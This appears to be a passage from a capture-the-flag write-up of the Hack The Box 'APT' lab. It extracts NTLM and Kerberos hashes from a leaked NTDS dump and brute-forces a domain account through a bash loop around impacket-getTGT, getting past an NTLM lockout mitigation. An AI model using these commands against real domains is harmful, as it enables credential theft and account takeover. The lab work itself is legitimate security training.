Brute-Force Hash
The backup archive found in one of the target SMB shares, accessible by anyone, holds a vital set of files that contains the entire domain credentials. While those files appeared to be outdated from the testing as only a single domain user is validated, it is still possible to make use of those hash strings by leveraging them for a Brute-Force attack.
┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ cat htb.local.ntds | cut -d ':' -f3-4 | tr -d [:blank:] > ntlm_hashes.txt
┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ cat htb.local.ntds.kerberos | grep 'aes256' | cut -d ':' -f3 | tr -d [:blank:] > kerberos_hashes.txtI will first create 2 file that only contains both NTLM and Kerberos hashes out of the credential dump;
NTLM (Fail)
While there are many tools that supports NTLM authentication, I will start with crackmapexec
Attempting to perform a brute-force attack on the henry.vinson user fails
The connection error indicates that there may be a brute-force mitigation in place to prevent the attack
While this may be the case for the direct NTLM authentication, I can try to resort to Kerberos authentication
Although crackmapexec supports Kerberos authentication with the -k flag, I will opt out to explore other tool options below
Kerberos (success)
while majority of impacket tools support supplying both NTLM hashes or AES Key for Kerberos authentication, it doesn’t support reading from a file for brute-force attack However, it could be resolved simply by scripting
#!/bin/bash
ipv6=dead:beef::b885:d62a:d679:573f
hashes=/home/kali/archive/htb/labs/apt/smb/hashdump/ntlm_hashes.txt
cat $hashes | while read hash;
do
echo "Testing $hash ..."
/usr/bin/impacket-getTGT htb.local/henry.vinson@apt.htb.local -no-pass -k -hashes $hash -dc-ip $IPv6
doneThe Bash script above will read NTLM hash from the ntlm_hashes.txt file and attempt to generate a TGT for the henry.vinson user via Kerberos authentication (-k)
impacket-getTGT is an excellent tool for this purpose as the generated TGT could be continuously leveraged for operation with a better OPSEC
┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ ./brute-force_hash.sh
[...REDACTED...]
testing aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb ...
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in henry.vinson@apt.htb.local.ccacheafter awhile, the matching ntlm hash was found for the henry.vinson user; aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
I also tried using aesKey(Kerberos Secret) over Kerberos authentication with no avail
Additionally, the NTLM hash belonged to the aine.stafford user, who no longer appeared to be valid
Although the relationship of those 2 users could not be identified at this point, it is still clear that there is password reuse
Now that I have a valid domain credential, I can finally start to dig deeper